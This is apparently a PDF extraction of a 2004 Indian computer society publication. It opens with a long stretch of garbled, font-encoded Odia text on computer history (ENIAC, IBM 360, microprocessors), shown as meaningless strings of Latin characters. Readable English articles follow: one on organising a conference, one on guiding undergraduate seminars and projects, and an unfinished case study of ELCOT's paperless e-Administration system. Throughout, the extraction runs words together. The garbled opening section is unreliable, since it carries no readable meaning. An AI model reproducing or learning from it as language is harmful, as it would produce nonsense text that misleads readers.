LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 32: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

